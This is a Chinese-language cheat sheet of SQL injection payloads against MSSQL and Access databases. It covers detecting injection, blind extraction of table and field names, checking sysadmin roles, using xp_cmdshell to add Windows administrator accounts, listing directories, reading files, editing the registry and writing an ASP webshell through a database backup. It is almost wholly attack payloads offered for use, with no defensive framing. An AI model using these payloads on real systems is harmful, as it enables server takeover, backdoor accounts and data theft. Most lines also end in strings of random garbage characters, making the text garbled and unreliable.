1.判断是否有注入;and 1=1 ;and 1=2 ��. CLi�v�
2.初步判断是否是mssql ;and user>0 4kT|�/��bp
+~ ��:1H.
3.注入参数是字符'and [查询条件] and ''=' ��=YB3^Z�
BGo�drb�1�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' wP�6~�HiC�
+�0�.$�w��
5.判断数据库系统 bh6�Mh<�+�
g�/m�Vd;#o
;and (select count(*) from sysobjects)>0 mssql U�p*p*�(d3
hrN�r��i$�
;and (select count(*) from msysobjects)>0 access OlRBv�foh8
k���^p�|H:
M�H�'S,^J
t�Ko�^A:�M
6.猜数据库 ;and (select Count(*) from [数据库名])>0 un6��grvxr
C��"<�l}
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ��}7g�\1l\
P@lExF*D1:
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 0LrTY��rlj
d&(GIH E&d
9.(1)猜字段的ascii值(access) +�yVz�)�
X
(Jo�cnM�|U
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �x{Gb�4=?l
��T�R�cY!�
(2)猜字段的ascii值(mssql) C=���h$8�Q
�D�sm_T1X�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��:v* _�Ay
�Ol~�sC�r�
10.测试权限结构(mssql) s� IY��`H^
)�|�XmF�4R
Ua,L�g�.�z
��k5$_Q�#�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- p;"pTGoW�i
E�&�#AX�:
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- R4�_4��FEo
�w-AF�5%gX
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �iPa!�pg4m
8 %Lq~�l�k
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Gz+�Bk5�#{
d@b"tb}�R�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- \Bw9%P�~ G
f%a�n<>j^w
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- G=jd�b@V/?
y)�"aQJ��>
;and 1=(select IS_MEMBER('db_owner'));-- Qa5<g���o{
b�guhx3s�
B$ �+YK�%I
Nw���+0b4{
11.添加mssql和系统的帐户 I�$n 0aR6�
�zob^z@�2�
;exec master.dbo.sp_addlogin username;-- ��5:hajXd�
;exec master.dbo.sp_password null,username,password;-- aM9^�V MOb
9FP�6Z[4��
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- '����6Yb�f
S�s@\'K�3e
;exec master.dbo.xp_cmdshell 'net user username password ��
PQa�{5"
X<�x"\�Yk
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- @r%��[e1�.
;�? '`�XB!
;exec master.dbo.xp_cmdshell 'net user username password /add';-- %q;3b�fq@N
�R."<h�e ;
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- [k��t!\�-�
9Y&n��$svB
z~L4BY�@z
M+gQN}BA�r
12.(1)遍历目录 \'q-Xr'}M�
�up=�4��B
;create table dirs(paths varchar(100), id int) �Q|@!z��My
%+L:Gm+^g#
;insert dirs exec master.dbo.xp_dirtree 'c:\' Gk;==���~�
W�LP A�51R
;and (select top 1 paths from dirs)>0 ��Q�i&!IG�
HN7�(-ml=B
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �6�m_Y%&
�
6�|�V71�3\
<?yAIh�gN*
eZ[CqU�J&�
(2)遍历目录 ^�c�Z�F#%k
9jD��V]!N4
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- +6B(LPxg�P
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 6�^�H64�jM
2IFri|;-eb
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 _U�T>,�c;h
Dq)V]�� Zx
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 @g�
}�r*U?
*Y?�r�ls�`
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ~=�lm91W �
W�B'��&�W=
<���K=��:_
O"<D�0xzF?
13.mssql中的存储过程 �X-|`|>3E
�$�z1u>{��
xp_regenumvalues 注册表根键, 子键 -;a}'�1HOE
Ett%Y*D+J�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 x>A(01�6:C
/1z�i�(z
�
xp_regread 根键,子键,键值名 .5�p"o-�:D
MH.�,�d�B&
;exec xp_regread R�3�T�dQ6j
7Y&W^]UZ0t
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 Y#{��� L}
�T\:�V�u{|
xp_regwrite 根键,子键, 值名, 值类型, 值 &{!FE`ZC_
Y/2@P�zA�|
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 W�rf��(�'�
KqG:�o�+V=
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �WN�rgq�yM
XpJT�/&�4
xp_regdeletevalue 根键,子键,值名 b/:��9^�&z
v?,�_SVgAi
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �G%Hr ���c
%�{!*)V�\�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ^GQ+,0��Yy
!X�$e;V"HX
dGt;t5An�V
f>k]{W Y�
14.mssql的backup创建webshell �8)s}>:�}�
Rb
��Jl;��
use model �mDEO$:��A
Di5eD���,N
create table cmd(str image); �ry\Nm[�SQ
7;:R\d�6iL
insert into cmd(str) values (''); &|'1.^f@;E
#K.OJ�JaG
backup database model to disk='c:\l.asp'; 12U1�DEd>-
)s5�Q4�m!
���m�Y*JNx
�X!Z�UR^��
15.mssql内置函数 �%D< =6suW
)cJ9YK�Ky
;and (select @@version)>0 获得Windows的版本号 z��lco?�Rt
�=�3$JeNK9
;and user_name()='dbo' 判断当前系统的连接用户是不是sa O68/H�f1W�
�,j>A[e&.�
;and (select user_name())>0 爆当前系统的连接用户 3�.Z}2F]��
@d�:TAwOI'
;and (select db_name())>0 得到当前连接的数据库 #!wu�}�nDu
r��z+)z:u�
l�
�tE`���
lQj3#�!1�}
16.简洁的webshell R*VRxQ,h6+
%Z�F�47P%6
use model [�v��( \y�
15U]/?jv8�
create table cmd(str image); ZX[�@P?A+-
/Fy2ZYs,`8
insert into cmd(str) values (''); T�f(-Duxz
�R�"�.~{6�
backup database model to disk='g:\wwwtest\l.asp';
